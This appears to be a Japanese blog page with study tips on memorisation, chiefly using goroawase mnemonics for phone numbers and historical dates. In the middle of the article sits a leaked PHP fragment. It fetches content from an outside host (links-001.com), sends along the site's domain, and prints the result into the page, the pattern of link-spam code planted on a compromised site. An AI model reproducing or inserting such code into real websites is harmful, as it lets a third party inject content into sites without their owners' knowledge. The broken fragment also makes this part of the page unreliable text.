前へ
次へ

暗記をする時に必要な訓練

暗記をして試験で良い点数を獲得した後に、覚えた事を長期間使用しないと、忘れてしまう可能性が高いです。

more

暗記に関してレベルを高めるために

効率よく暗記力を高めるためには、その類のスクールに通って勉強することが大事です。基本的に闇雲に何かを

more

効率よく暗記力を高める方法に関して

これからまさに、暗記力を効率よく高めたいと感じているのであれば、その方法に関して色々と模索するように

more

暗記をするときは語呂合わせを考える

人と会ったときに電話番号などを教えてもらうことがあるでしょう。今は携帯電話やスマホに電話をかけてもらってそれを機械の中で保存させればいいので、いちいちそれぞれの番号を覚える必要はありません。さすがに自分の番号や家族の番号などは覚えるかもしれませんが、知り合い全員の番号となると覚えられないでしょう。電話番号が覚えられない理由としてはその数字が意味のない数字の羅列であることも関係しています。もし番号に一定の法則があったら簡単に予測されてしまって大変になるかも知れませんが、かつては自分で覚えるしかなく大変だった時期もあります。電話番号など意味のない数字の羅列を暗記するときに使うと良い方法としては語呂合わせがあります。1234であればいにさしなどそれぞれの数字の頭文字などだけであれば4文字で覚えることができます。いにさしだと何の意味もない言葉なのでそのうち忘れてしまうでしょうが、もっと意味のある語呂合わせと作れば覚えやすくなるでしょう。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

社会においては歴史の年号を暗記することがあり、その時に語呂合わせを使うケースがあります。過去にはいろいろな出来事がたくさんあるものの、必ずしもその出来事と起きた年数でうまい語呂合わせが作れるわけではありません。どうすればいいかですが、実は歴史の年号に関しては先人たちが色々な語呂合わせを用意してくれています。鎌倉幕府ができたのはかつては1192年とされ、その時はいいくに作ろうと覚えると良いとされていました。困りごととしては歴史は研究によって変化することで、鎌倉幕府は実は1185年に開かれたとするのが今の常識になっています。今その年号を覚えるときはいいくにではなくいいはこ作ろうになっているそうです。もちろん社会の年号以外にも海外の都市名であったり、理科の元素記号など簡単に覚えられない言葉がいろいろありますから、それらを覚えるときに語呂合わせを使いましょう。自分で考えつかないなら、先人が使ったものを使えば楽に勉強できます。

Page Top